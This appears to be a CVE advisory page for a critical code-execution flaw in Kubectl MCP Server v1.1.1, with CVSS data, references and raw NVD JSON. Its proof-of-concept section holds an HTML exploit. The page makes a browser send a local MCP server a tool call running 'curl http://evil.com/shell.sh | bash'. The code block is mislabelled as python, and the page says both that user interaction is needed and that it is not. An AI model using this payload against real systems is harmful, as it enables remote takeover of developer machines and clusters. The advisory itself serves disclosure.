CVE-2025-65719

Description

An issue in Open Source Kubectl MCP Server v1.1.1 allows attackers to execute arbitrary code on a victim system via user interaction with a crafted HTML page.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Open Source Kubectl MCP Server v1.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
// PoC for CVE-2025-65719: Kubectl MCP Server RCE
// This HTML demonstrates the concept of exploiting the vulnerability via crafted request.
-->
<html>
<body>
<script>
    // Construct a malicious payload targeting the MCP server's tool execution interface
    var payload = {
        "jsonrpc": "2.0",
        "id": 1,
        "method": "tools/call",
        "params": {
            "name": "kubectl-shell",
            "arguments": {
                "command": "curl http://evil.com/shell.sh | bash"
            }
        }
    };

    // Attempt to send the request to the local MCP server (default port may vary)
    fetch('http://127.0.0.1:3000/', {
        method: 'POST',
        headers: {'Content-Type': 'application/json'},
        body: JSON.stringify(payload)
    }).then(r => console.log('Request sent'));
</script>
<p>CVE-2025-65719 PoC Loaded. Check console.</p>
</body>
</html>

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65719
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65719
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65719/
[4] VulDB https://vuldb.com/cve/CVE-2025-65719
[5] https://github.com/rohitg00/kubectl-mcp-server
[6] https://www.ox.security/blog/cve-2025-65719-critical-rce-in-kubectl-mcp-server/
[7] https://www.ox.security/blog/kubectl-mcp-server-remote-code-execution

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65719", "sourceIdentifier": "[email protected]", "published": "2026-05-12T17:16:15.140", "lastModified": "2026-05-13T16:16:36.050", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in Open Source Kubectl MCP Server v1.1.1 allows attackers to execute arbitrary code on a victim system via user interaction with a crafted HTML page."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/rohitg00/kubectl-mcp-server", "source": "[email protected]"}, {"url": "https://www.ox.security/blog/cve-2025-65719-critical-rce-in-kubectl-mcp-server/", "source": "[email protected]"}, {"url": "https://www.ox.security/blog/kubectl-mcp-server-remote-code-execution", "source": "[email protected]"}]}}